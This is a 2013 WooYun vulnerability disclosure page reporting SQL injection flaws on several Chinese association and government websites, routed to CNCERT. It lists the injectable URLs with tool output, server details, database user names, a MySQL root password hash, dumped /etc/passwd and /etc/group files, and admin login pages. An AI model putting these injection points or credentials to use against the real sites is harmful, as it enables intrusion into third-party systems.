当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-024648

漏洞标题:各省市各行业协会与某政府安全漏洞打包

相关厂商:各省市各行业协会and某政府

漏洞作者: 雅柏菲卡

提交时间:2013-05-28 12:52

修复时间:2013-07-12 12:52

公开时间:2013-07-12 12:52

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-05-28: 细节已通知厂商并且等待厂商处理中
2013-06-01: 厂商已经确认,细节仅向厂商公开
2013-06-11: 细节向核心白帽子及相关领域专家公开
2013-06-21: 细节向普通白帽子公开
2013-07-01: 细节向实习白帽子公开
2013-07-12: 细节向公众公开

简要描述:

....

详细说明:

....

漏洞证明:

【上海市快递业协会】
注入点 http://www.shkdxh.com/Policiesandregulations/Policiesandregulations.php?parentid=14
Target: 		http://www.shkdxh.com/Policiesandregulations/Policiesandregulations.php?parentid=14
Host IP:		222.73.218.56
Web Server: 	Microsoft-IIS/6.0
Powered-by: 	ASP.NET
Powered-by: 	PHP/5.2.17
DB Server: 	MySQL >=5
Resp. Time(avg):	671 ms
Current User: 	kdxhdata@localhost
Sql Version: 	5.1.63-community
Current DB: 	kdxhdata
System User: 	kdxhdata@localhost
Host Name: 	ewww6-c5d621bc4
Installation dir: 	D:\Data\MySQL\MySQL Server 5.1
DB User: 	'kdxhdata'@'localhost'
Data Bases: 	information_schema
		kdxhdata
1.jpg




后台可进  我就不截图了  测试账号居然不删的  囧死了


【中山市物流协会】
注入点 http://www.zsla.org/issue/showDetail.do?id=44ffb2x13c20645ea7xz7fbb1359603524214
Target: 		http://www.zsla.org/issue/showDetail.do?id=44ffb2x13c20645ea7xz7fbb1359603524214
Host IP:		119.145.255.140
Web Server: 	nginx/1.2.0
DB Server: 	MySQL >=4.1
Resp. Time(avg):	97 ms
Current User: 	root@127.0.0.1
Sql Version: 	4.1.20-standard-log
Current DB: 	logistics
System User: 	root@127.0.0.1
DB User & Pass: 	root:*1C66292FFB5D037ECC7825FFCF57B2C2F99D7F1A:localhost
		root:*1C66292FFB5D037ECC7825FFCF57B2C2F99D7F1A:119.145.255.140
		root:*1C66292FFB5D037ECC7825FFCF57B2C2F99D7F1A:127.0.0.1
2.jpg




[/etc/passwd]
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rtkit:x:499:499:RealtimeKit:/proc:/sbin/nologin
abrt:x:498:498::/etc/abrt:/sbin/nologin
saslauth:x:497:495:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
pulse:x:496:494:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
forgov:x:500:500:forgov:/home/forgov:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:495:489:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
clamav:x:494:488:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
amavis:x:493:487::/var/spool/amavisd:/sbin/nologin
vmail:x:501:501::/var/vmail:/sbin/nologin
policyd:x:502:502::/home/policyd:/sbin/nologin
iredadmin:x:503:503::/home/iredadmin:/sbin/nologin
iredapd:x:504:504:iRedAPD daemon user:/home/iredapd:/sbin/nologin
nagios:x:505:505::/home/nagios:/bin/bash
zabbix:x:506:506::/home/zabbix:/bin/bash
[/etc/group]
root:x:0:root
bin:x:1:root,bin,daemon
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root
lp:x:7:daemon,lp
mem:x:8:
kmem:x:9:
wheel:x:10:root
mail:x:12:mail,postfix
uucp:x:14:uucp
man:x:15:
games:x:20:
gopher:x:30:
video:x:39:
dip:x:40:
ftp:x:50:
lock:x:54:
audio:x:63:
nobody:x:99:
users:x:100:
dbus:x:81:
utmp:x:22:
utempter:x:35:
floppy:x:19:
vcsa:x:69:
avahi-autoipd:x:170:
rpc:x:32:
rtkit:x:499:
abrt:x:498:
desktop_admin_r:x:497:
desktop_user_r:x:496:
cdrom:x:11:
tape:x:33:
dialout:x:18:
saslauth:x:495:
postdrop:x:90:
postfix:x:89:
rpcuser:x:29:
nfsnobody:x:65534:
haldaemon:x:68:haldaemon
kvm:x:36:qemu
qemu:x:107:
avahi:x:70:
ntp:x:38:
sshd:x:74:
mysql:x:27:
tcpdump:x:72:
slocate:x:21:
oprofile:x:16:
pulse:x:494:
pulse-access:x:493:
stapdev:x:492:
stapusr:x:491:
fuse:x:490:
stap-server:x:155:
gdm:x:42:
forgov:x:500:
dovecot:x:97:
dovenull:x:489:
apache:x:48:
clamav:x:488:
amavis:x:487:clamav
vmail:x:501:
policyd:x:502:
iredadmin:x:503:
iredapd:x:504:
nagios:x:505:
zabbix:x:506:
vbirdgroup:x:507:


【广东省企业信用信息网】
注入点:http://www.credit.gov.cn/private/voteResult.jsp?TOPIC=您认为广东信用建设应从哪方面着手:
Target: 		http://www.credit.gov.cn/private/voteResult.jsp?TOPIC=您认为广东信用建设应从哪方面着手:
Host IP:		210.76.66.106
Web Server: 	Apache/2.0.49 (Unix)
DB Server: 	Oracle
Resp. Time(avg):	2590 ms
Current User: 	CREDIT
Is User DBA: 	FALSE
Sql Version: 	Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 - Prod
Current DB: 	CRDT
Host Name: 	localhost
DB User: 	SCOTT
		MGMT_VIEW
		WKPROXY
		WKSYS
		MDDATA
		SYSMAN
		ANONYMOUS
		XDB
		WK_TEST
		OLAPSYS
		CTXSYS
		MDSYS
		SI_INFORMTN_SCHEMA
		ORDPLUGINS
		ORDSYS
		EXFSYS
		WMSYS
		DBSNMP
		DMSYS
		DIP
		OUTLN
		SYSTEM
		SYS
		CREDIT
Data Bases: 	SYS
		SYS
		SYS
		SYS
3.jpg



  虽然不知道是什么用的数据表  但是我觉得挺厉害的


湖北省物流公共信息服务平台
登陆框注入
4.jpg







5.jpg




http://www.56ok.net/backstage/Login.aspx 后台


【东莞市物流行业协会官方网】
注入点 http://www.0769wl.com/info/info_browse.php?infoID=6548
Target: 		http://www.0769wl.com/info/info_browse.php?infoID=6548
Host IP:		222.186.191.104
Web Server: 	Microsoft-IIS/6.0
Powered-by: 	ASP.NET
Powered-by: 	PHP/5.2.6
DB Server: 	MySQL >=5
Resp. Time(avg):	210 ms
Current User: 	sql0769wl@suer-ab6d8c667e
Sql Version: 	5.0.51b-community-nt
Current DB: 	sql0769wl
System User: 	sql0769wl@suer-ab6d8c667e
Host Name: 	suer-ab6d8c667e
Installation dir: 	E:\PHPnow\MySQL-5.0.15b
DB User: 	'sql0769wl'@'%'
Data Bases: 	information_schema
		sql0769wl
6.jpg




不知道哪个是 后台表  搁在这儿


【南通市银行业协会】
注入点 http://www.bankingassociationnt.com/news/Transfer.asp?newsid=8084
7.jpg




用户名可读出  具体的应急中心测试吧


【海南省注册会计协会】
注入点:http://www.hicpa.org.cn/acctt_web/papers/zhxx.asp?cs=101
8.jpg







9.jpg

修复方案:

版权声明:转载请注明来源 雅柏菲卡@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-06-01 22:13

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2013-05-28 23:20 | cncert国家互联网应急中心(乌云厂商)

    已经在28日分发给多个分中心自行验证和处置,待30日这样集中确认。

  2. 2013-07-12 17:00 | warrioj4 ( 路人 | Rank:4 漏洞数:2 | 专注工具30年)

    至今还没有修补 我建议乌云对那些sql诸如漏洞 长期不修补的站点 不用公布Url了